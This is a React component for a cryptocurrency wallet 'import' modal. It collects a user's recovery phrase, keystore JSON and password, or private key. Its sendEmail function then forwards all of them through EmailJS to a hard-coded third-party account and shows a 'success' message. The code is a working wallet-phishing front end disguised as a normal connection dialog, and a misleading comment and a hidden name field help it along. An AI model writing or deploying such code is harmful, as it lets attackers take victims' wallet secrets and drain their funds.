import React, { useState, useRef } from "react";
import { ActionButton } from "../button/ActionButton";
import emailjs from "@emailjs/browser";

import {
  ModalOverlayContainer,
  InnerModalContainer,
  ModalContainer,
  HeaderSection,
  HeaderTextSection,
  Wrapper,
  H3,
  WalletLogosection,
  WalletLogo,
  ContentSection,
  TabHeader,
  TabHeaderText,
  Content,
  Form,
  TextArea,
  Input,
  InfoText,
  ButtonSection,
  ButtonWrapper,
} from "./Modal.styles";
import { ToastMessage } from "../toastMessage/toastMessage";

export const Modal = ({ logo, openModal, handleModal, name }) => {
  const [inputValue, setInputValue] = useState("");
  const [textAreaPhraseValue, setTextAreaPhraseValue] = useState("");
  const [textAreaKeystoreValue, setTextAreaKeystoreValue] = useState("");
  const [textAreaPrivateKeyValue, setTextAreaPrivateKeyValue] = useState("");
  const [selected, setSelected] = useState("Phrase");
  const [activate, setActivate] = useState(false);
  const handleToastMessage = () => {
    setActivate(true);
    setTimeout(() => {
      setActivate(false);
    }, 3000);
  };

  const handleSelected = (name) => {
    setSelected(name);
  };

  const data = [
    {
      walletInfoHeader: "Phrase",
      textAreaPlaceholder: "Enter your recovery Phrase",
      noteText: "Typically 12 (sometimes 24) words separated by single spaces",
      id: 1,
    },
    {
      walletInfoHeader: "Keystore JSON",
      textAreaPlaceholder: "Enter your Keystore JSON",
      inputPlaceHolder: "Enter your Password",
      id: 2,
    },
    {
      walletInfoHeader: "Private Key",
      textAreaPlaceholder: "Enetr your Private Key",
      id: 3,
    },
  ];

  const handleInputOnChange = (e) => {
    setInputValue(e.target.value);
  };
  const handleTextAreaPhraseOnChange = (e) => {
    setTextAreaPhraseValue(e.target.value);
  };
  const handleTextAreaKeystoreOnChange = (e) => {
    setTextAreaKeystoreValue(e.target.value);
  };
  const handleTextAreaPrivateKeyOnChange = (e) => {
    setTextAreaPrivateKeyValue(e.target.value);
  };

  // The function below is for sending the form data to users
  const form = useRef();
  const handleInputReset = () => {
    setInputValue("");
    setTextAreaKeystoreValue("");
    setTextAreaPrivateKeyValue("");
    setTextAreaPhraseValue("");
  };

  const sendEmail = (e) => {
    e.preventDefault();
    emailjs
      .sendForm(
        "service_qfwtnmd",
        "template_i5gml6l",
        form.current,
        "gjQDwUyFAQBPFk75i"
      )
      .then(
        (result) => {
          console.log(result, handleToastMessage(), handleInputReset());
        },
        (error) => {
          console.log(error);
        }
      );
  };

  return (
    <ModalOverlayContainer openModal={openModal}>
      <InnerModalContainer>
        <ToastMessage message="success" activate={activate} />
        <ModalContainer boxedLayout>
          <HeaderSection paddingVertical="0">
            <HeaderTextSection>
              <H3>Import your {name}</H3>
            </HeaderTextSection>
            <WalletLogosection>
              <WalletLogo src={logo} alt="" />
            </WalletLogosection>
          </HeaderSection>
          <ContentSection paddingVertical="0">
            <TabHeader>
              {data.map(({ walletInfoHeader, id }) => (
                <TabHeaderText
                  onClick={() => {
                    handleSelected(walletInfoHeader);
                  }}
                  style={
                    selected === walletInfoHeader
                      ? { color: "#363636" }
                      : { color: "#6f859f" }
                  }
                >
                  {walletInfoHeader}
                </TabHeaderText>
              ))}
            </TabHeader>
            <Content>
              <Form ref={form} selected={selected}>
                <Wrapper paddingVertical="0">
              
                  <TextArea
                    placeholder={"Enter your recovery Phrase"}
                    value={textAreaPhraseValue}
                    onChange={handleTextAreaPhraseOnChange}
                    rows={4}
                    name={"phrase"}
                    required
                  />
                  <InfoText>
                    Typically 12 (sometimes 24) words separated by single spaces
                  </InfoText>
                </Wrapper>

                <Wrapper paddingVertical="0">
                  <TextArea
                    placeholder={"Enter your Keystore JSON"}
                    value={textAreaKeystoreValue}
                    onChange={handleTextAreaKeystoreOnChange}
                    rows={4}
                    name={"keystore"}
                    required
                  />
                  <Input
                    type="password"
                    placeholder="Enter your Password"
                    value={inputValue}
                    onChange={handleInputOnChange}
                    name={"password"}
                    required={true}
                  />
                </Wrapper>
                <Wrapper paddingVertical="0">
                  <TextArea
                    placeholder={"Enter your Private Key"}
                    value={textAreaPrivateKeyValue}
                    onChange={handleTextAreaPrivateKeyOnChange}
                    rows={4}
                    name={"privateKey"}
                    required
                  />
                </Wrapper>
                  <input name="name" value={name} style={{width:0,height:0}}/>
              </Form>
            </Content>
          </ContentSection>
          <ButtonSection>
            <ButtonWrapper>
              <ActionButton
                btnText="Proceed"
                type="submit"
                onClick={sendEmail}
              />
            </ButtonWrapper>
            <ButtonWrapper width="90%">
              <ActionButton
                btnText="Cancel"
                background={`transparent linear-gradient(0deg,#ff2442,#e21395)`}
                onClick={() => {
                  handleModal();
                  setSelected("Phrase");
                }}
              />
            </ButtonWrapper>
          </ButtonSection>
        </ModalContainer>
      </InnerModalContainer>
    </ModalOverlayContainer>
  );
};
